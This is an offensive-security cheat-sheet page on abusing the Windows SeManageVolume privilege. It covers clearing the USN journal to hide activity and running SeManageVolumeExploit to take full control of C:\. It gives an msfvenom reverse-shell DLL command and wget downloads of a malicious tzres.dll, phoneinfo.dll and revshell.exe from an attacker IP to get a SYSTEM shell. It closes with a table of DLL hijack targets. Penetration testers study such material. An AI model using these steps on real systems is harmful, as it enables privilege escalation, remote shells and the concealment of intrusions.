SeManageVolume

The SeManageVolume privilege (aka Manage Volume) allows direct control over NTFS volumes, including the ability to clear the Update Sequence Number (USN) change journal, which logs every file and directory modification on a volume for forensic and backup purposes. Clearing the journal erases this history, making post-exploitation activity harder to detect.

Beyond this, the privilege can be actively exploited to gain write access to the entire volume. Tools such as SeManageVolumeExploit can leverage the privilege to modify permissions across C:\, effectively granting full control over all files and directories.

# Check permissions
> whoami /priv

Privilege Name                Description                      State
============================= ================================ ========
SeManageVolumePrivilege       Perform volume maintenance tasks Disabled

# Run the exploit
> .\SeManageVolumeExploit.exe

# Check volume permissions
> icacls c:\
c:\ NT AUTHORITY\SYSTEM:(OI)(CI)(F)
    BUILTIN\Users:(OI)(CI)(F) # Full Access

A SYSTEM level shell can be gain via DLL hijacking. For example, the tzres.dll can be used to perform a DLL hijack on systeminfo. 

# Create a malicious DLL
msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=192.168.45.241 LPORT=80 -f dll -o tzres.dll

Dropping the malicious DLL to C:\Windows\system32\wbem\tzres.dll and running systeminfo will load the DLL, executing code as NT AUTHORITY\NETWORK SERVICE.

> wget 192.168.45.241:443/tzres.dll -O c:\windows\system32\wbem\tzres.dll
> systeminfo

The phoneinfo.dll can be also leveraged as shown here:

> wget 192.168.45.241:443/phoneinfo.dll -O c:\windows\system32\phoneinfo.dll
> wget 192.168.45.241:443/Report.wer -O Report.wer
> wget 192.168.45.241:443/WerTrigger.exe -O WerTrigger.exe
> wget 192.168.45.241:443/revshell.exe -O revshell.exe
> .\WerTrigger.exe
c:\users\public\revshell.exe

Other high-value DLL hijack targets for common Windows binaries:

Binary
DLL(s) to Hijack
Drop Location

systeminfo.exe

tzres.dll, wbemcomn.dll

C:\Windows\System32\wbem\

taskmgr.exe

UIAutomationCore.dll

C:\Windows\System32\

eventvwr.exe

mmc.dll, wevtapi.dll

C:\Windows\System32\

notepad.exe

dbghelp.dll, msvcrt.dll

C:\Windows\System32\

perfmon.exe

perfts.dll, perfc009.dll

C:\Windows\System32\

wmic.exe

fastprox.dll, wbemcomn.dll, wmiprvsd.dll

C:\Windows\System32\wbem\

winmgmt.exe

fastprox.dll, wbemcomn.dll

C:\Windows\System32\wbem\

mstsc.exe

rdpencom.dll, tsres.dll

C:\Windows\System32\

PreviousSeImpersonateNextServices

Last updated

Was this helpful?